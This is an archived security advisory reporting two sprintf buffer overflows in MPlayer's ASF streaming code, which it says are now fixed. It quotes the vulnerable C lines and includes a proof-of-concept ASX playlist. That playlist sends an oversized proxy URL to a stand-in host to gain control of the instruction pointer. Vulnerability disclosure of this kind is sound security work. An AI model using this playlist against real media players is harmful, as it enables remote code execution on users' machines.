TUCoPS :: Linux :: Apps A-M :: bt1225.txt

Mplayer Buffer Overflow 



Favorite Linux Player Buffer Overflow
=20

 Product:  Mplayer
 Developers:  http://www.mplayerhq.hu
 OS:    Port to All *NIX and Win32
 Remote Exploitable:  YES

Developers has been contacted, problem was fixed, recomended update =
your
mplayer version.

 In the source tree there is a file called asf_streaming.c this file =
has a
function named asf_http_request, that function has two buffer =
overflows,
this overflows are in the sprintf lines.
=20
=20
 asf_http_request {
 		char str[250];
 		....
 		...
 		..
 		sprintf( str, "Host: %s:%d", server_url->hostname,
 server_url->port );    =20
 		....
 		...=09
 		..
 		sprintf( str, "Host: %s:%d", url->hostname, url->port );
=20
 		....
 		...
 		..
 }

=20
 =20
 This, at a first look, may look as it can=B4t be exploited ( because =
the
MAXHOSTLEN size restriction )... but if in an ASX file like this with a
"badsite" listening in "badport" send "\n\n" as answer you could lead =
to a
fully controllable EIP buffer overflow
=20
=20
 <asx version =3D "3.0">
 <title>Bas Site ASX</title>
=20
 <moreinfo href =3D "mailto:info@badsite.com
 <mailto:info@badsite.com> " />
 <logo href =3D "http://www.badsite.com/streaming/grupo.gif
 <http://www.badsite.com/streaming/grupo.gif> " style=3D"ICON" />
 <banner href=3D "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target=3D"_blank" href =3D "http://www.badsite.com/
 <http://www.badsite.com/> " />
 </banner>
=20
 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>=A9 All by the news</COPYRIGHT>
 <ref href =3D
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaa
aaaaaaaaaaaa"/>
 <logo href =3D "http://www.badsite.com/streaming/grupo.gif
 <http://badsite.com/streaming/grupo.gif> " style=3D"ICON" />
 </entry>
 </asx>
=20


 Regards,
=20
   Hern=E1n Otero
   hernan.otero@eds.com=20

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH